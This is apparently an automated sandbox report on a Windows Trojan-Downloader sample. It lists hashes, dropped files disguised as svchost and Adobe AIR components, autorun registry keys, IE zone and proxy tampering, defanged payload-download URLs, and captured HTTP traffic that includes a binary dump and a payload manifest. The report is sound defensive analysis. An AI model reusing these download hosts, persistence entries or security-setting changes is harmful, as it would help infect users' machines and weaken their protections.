Gen.Variant.Kazy.498177_586aabede0
Trojan-Downloader.MSIL.Agent.hfq (Kaspersky), Gen:Variant.Kazy.498177 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by the Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 586aabede0d6c100a7882cb298abc906
SHA1: 65a4ddd54f2dca0c6d09ef0d8729b0f365f891bf
SHA256: 61223d57304d94baaab15607eb47ccc8fa664d56bd74571d1b1b972ffde0e399
SSDeep: 24576:nAT8QE kqlg8F1hnepRdOAFWq8GTi9B8I4sKcXkIAc:nAI Px1Z /1TjI4sKEkIAc
Size: 1177056 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1872
instal.exe:1992
launcher.exe:1532
WPFFontCache_v0400.exe:1988
The Trojan injects its code into the following process(es):
launcher.exe:844
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (2917 bytes)
%Documents and Settings%\%current user%\Application Data\svchost.exe (12 bytes)
%Documents and Settings%\%current user%\Application Data\pandahack.exe (18251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
The process instal.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\Adobe AIR\Versions\1.0\Adobe AIR.dll (324576 bytes)
%System%\META-INF\AIR\application.xml (1 bytes)
%System%\svchostUpdate.exe (1067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\Company\Test\Uninstall.exe (3195 bytes)
%System%\META-INF\AIR\hash (32 bytes)
%System%\launcher.swf (3 bytes)
%System%\META-INF\signatures.xml (818 bytes)
%System%\launcher.exe (329 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\adobecp.dll (90336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (34242 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll (162417 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe (1568 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll (60436 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (20637 bytes)
%System%\mimetype (59 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\adobecp.vch (11242 bytes)
%Program Files%\Company\Test\Uninstall.ini (3 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\WebKit.dll (77249 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)
The process launcher.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\svchost\Adobe AIR\Versions\1.0\Adobe AIR.dll (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Adobe AIR[1] (2917624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\main[1].swf (60712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\mimetype[1] (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Adobe AIR[1].vch (217004 bytes)
%System%\svchost\mimetype (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\svchost[1] (5716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\AdobeCP[1] (1051142 bytes)
%System%\svchost\svchost.exe (59 bytes)
%System%\svchost\main.swf (1673 bytes)
%System%\svchost\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The process launcher.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\signatures[1].xml (825 bytes)
%System%\META-INF\AIR\application.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\application[1].xml (1400 bytes)
%System%\launcher.swf (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].xml (818 bytes)
%System%\META-INF\signatures.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\hash[1] (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\launcher[1].swf (796 bytes)
%System%\META-INF\AIR\hash (32 bytes)
Registry activity
The process %original file name%.exe:1872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallDate" = "20150111"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"URLInfoAbout" = "http://www.company.com/"
"InstallSource" = "c:\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayName" = "Test 1.00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayIcon" = "\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallLocation" = "\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"HelpLink" = "mailto:[email protected]"
"UninstallString" = "\Uninstall.exe"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayVersion" = "1.00"
"Publisher" = "Company"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"svchost.exe" = "Программа установки"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 AA FD 72 11 C0 68 61 3E 0C 32 A6 46 7B D9 2A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"VersionMinor" = "0"
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"EstimatedSize" = "1037"
"VersionMajor" = "1"
"Language" = "1049"
The Trojan modifies the IE security-zone settings so that local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
To run automatically each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Flash Updater" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"
The process instal.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallDate" = "20150111"
"URLInfoAbout" = "http://www.company.com/"
"InstallSource" = "%Program Files%\svhost\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayName" = "Test 1.00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayIcon" = "%Program Files%\Company\Test\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"InstallLocation" = "%Program Files%\Company\Test\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"HelpLink" = "mailto:[email protected]"
"UninstallString" = "%Program Files%\Company\Test\Uninstall.exe"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"DisplayVersion" = "1.00"
"Publisher" = "Company"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 AF 50 62 91 D4 00 D9 18 65 34 B8 C5 3B E9 61"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"VersionMinor" = "0"
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"Launcher.exe" = "launcher"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Test 1.00]
"EstimatedSize" = "38108"
"VersionMajor" = "1"
"Language" = "1049"
The Trojan modifies the IE security-zone settings so that local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
To run automatically each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"test" = "%WinDir%\System32\launcher.exe"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The process launcher.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 12 D7 07 32 15 2B E6 CB 02 9C BD E0 A8 6A F6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE security-zone settings so that local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process launcher.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 92 37 1C 29 03 7F 22 4C CC E2 C3 25 05 08 F2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE security-zone settings so that local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process WPFFontCache_v0400.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 84 94 23 52 47 EF C3 E9 99 4E 37 27 AB 27 8A"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| d1529a522773fc6ab2192d80f7b0ec2e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\pandahack.exe |
| 53abeb6693f4ee48c5c599fc3e6b349c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\svchost.exe |
| bb4dd20cb94e3a77c594f50031a8aab0 | c:\Program Files\svhost\instal.exe |
| be9952f061099b0421145f32d5f79c8a | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Adobe AIR.dll |
| 3cc6f3bcbf2fb4472ae1122159dc949f | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll |
| 2e14ffbe1c3c1e742ac28dc7cb7bf2e2 | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe |
| e488467e5c14432f0b71ccec7f5946a7 | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll |
| 952b934e64bbbd8df0d528ad70a75f3f | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\WebKit.dll |
| 074cf18a75896826af203bb790b51625 | c:\WINDOWS\system32\Adobe AIR\Versions\1.0\Resources\adobecp.dll |
| 25aca18c491a20211c304051570c4387 | c:\WINDOWS\system32\svchostUpdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Company
Product Name:
Product Version:
Legal Copyright: Company
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.00
File Description: Test 1.00 Installation
Comments:
Language: Chinese (Simplified, PRC)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 148684 | 148992 | 4.57091 | 5e14e4ede2e2215bc7d72837b9871f8f |
| DATA | 155648 | 10388 | 10752 | 2.62963 | abafcbfbd7f8ac0226ca496a92a0cf06 |
| BSS | 167936 | 4341 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 176128 | 6040 | 6144 | 3.3864 | a4e0ac39d5ed487ceea059fa23dfce5e |
| .tls | 184320 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 188416 | 24 | 512 | 0.14174 | c4fdd0c5c9efb616fcc85d66056ca490 |
| .reloc | 192512 | 6276 | 6656 | 4.56552 | 867a1120317d51734587a74f6ee70016 |
| .rsrc | 200704 | 191384 | 191488 | 1.16869 | deda197d0e6ed6ff6f5abe94aba5d863 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://xz-wow.ru/niga.exe | |
| hxxp://xz-wow.ru/update.xml?1420990600032 | |
| hxxp://xz-wow.ru/Update/launcher/launcher.swf?1420990601267 | |
| hxxp://xz-wow.ru/Update/launcher/META-INF/signatures.xml?1420990601454 | |
| hxxp://xz-wow.ru/Update/launcher/META-INF/AIR/application.xml?1420990601610 | |
| hxxp://xz-wow.ru/Update/launcher/META-INF/AIR/hash?1420990601735 | |
| hxxp://xz-wow.ru/update.xml?1420990602751 | |
| hxxp://xz-wow.ru/Update/main.swf?1420990603282 | |
| hxxp://xz-wow.ru/Update/mimetype?1420990604517 | |
| hxxp://xz-wow.ru/Update/svchost.exe?1420990604642 | |
| hxxp://xz-wow.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 | |
| hxxp://www.shmonka.ru/Update/launcher/META-INF/AIR/hash?1420990601735 | |
| hxxp://www.shmonka.ru/Update/svchost.exe?1420990604642 | |
| hxxp://www.shmonka.ru/update.xml?1420990600032 | |
| hxxp://www.shmonka.ru/Update/main.swf?1420990603282 | |
| hxxp://www.shmonka.ru/Update/launcher/META-INF/AIR/application.xml?1420990601610 | |
| hxxp://www.shmonka.ru/Update/launcher/launcher.swf?1420990601267 | |
| hxxp://www.shmonka.ru/Update/mimetype?1420990604517 | |
| hxxp://www.shmonka.ru/Update/launcher/META-INF/signatures.xml?1420990601454 | |
| hxxp://www.shmonka.ru/update.xml?1420990602751 | |
| hxxp://www.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /niga.exe HTTP/1.1
Host: xz-wow.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:35:36 GMT
Content-Type: application/octet-stream
Content-Length: 15175309
Last-Modified: Mon, 29 Dec 2014 07:47:36 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....F..........hT.......`....@..........................@......,.....
.......@......................................@ ......................
......................................................................
..............CODE.....D.......F.................. ..`DATA.....(...`..
.*...J..............@...BSS..................t...................idata
[email protected]................................
[email protected]....................
[email protected]...@ ......."[email protected]............. ..
[email protected]..............................................
......................................................................
[email protected]............@...
[email protected][email protected][email protected][email protected][email protected].@.@.@.
[email protected]@[email protected].% .B....%..B....%..B....%..B....%..B....%..B....%
,.B....%..B....%..B....%..B....%..B....%..B....%<.B....%8.B....%4.B
....%..B....%H.B....%D.B....%..B....%..B...S........T......D$,.t...\$0
....D[....%..B....%..B....%..B....%..B....%..B....%..B....%..B....%..B
...S......B..;.uYhD...j.......D$..|$..u.3...$.P.D$.....B....D$....B.3.
[email protected]$..D$......D$...$..$...[..<<< skipped >>>
GET /update.xml?1420990602751 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:34 GMT
Content-Type: text/xml
Content-Length: 3993
Last-Modified: Sat, 03 Jan 2015 14:00:06 GMT
Connection: keep-alive
Accept-Ranges: bytes
<xml>
<file>
  <fileName>svchostUpdate.exe</fileName>
  <fileDir>../</fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/launcher/svchostUpdate.exe</fileDirWebServer>
  <filesize>59392</filesize>
</file>
<file>
  <fileName>main.swf</fileName>
  <fileDir></fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/main.swf</fileDirWebServer>
  <filesize>392738</filesize>
</file>
<file>
  <fileName>mimetype</fileName>
  <fileDir></fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/mimetype</fileDirWebServer>
  <filesize>59</filesize>
</file>
<file>
  <fileName>svchost.exe</fileName>
  <fileDir></fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/svchost.exe</fileDirWebServer>
  <filesize>59392</filesize>
</file>
<file>
  <fileName>Adobe AIR.dll</fileName>
  <fileDir>Adobe AIR/Versions/1.0/</fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll</fileDirWebServer>
  <filesize>14317952</filesize>
</file>
<file>
  <fileName>Adobe AIR.vch</fileName>
  <fileDir>Adobe AIR/Versions/1.0/Resources/</fileDir>
  <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.0/Resources/Adobe AIR.vch</fileDirWeb<<< skipped >>>
